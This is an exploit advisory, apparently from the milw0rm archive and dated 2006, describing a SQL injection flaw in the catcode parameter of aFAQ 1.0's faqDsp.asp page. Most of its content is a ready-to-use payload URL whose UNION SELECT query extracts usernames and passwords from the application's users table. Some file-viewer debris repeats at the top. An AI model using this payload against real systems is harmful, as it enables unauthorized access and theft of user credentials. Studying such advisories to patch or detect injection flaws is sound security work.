25 lines
No EOL
644 B
Text
25 lines
No EOL
644 B
Text
*******************************************************************************
|
|
# Title : aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://www.alanward.net
|
|
# $$ : Free
|
|
*******************************************************************************
|
|
|
|
[[SQL]]]---------------------------------------------------------
|
|
|
|
http://[target]/[path]//faqDsp.asp?catcode=[SQL]
|
|
|
|
Example:
|
|
|
|
//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
|
|
|
|
[[/SQL]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2006-12-28] |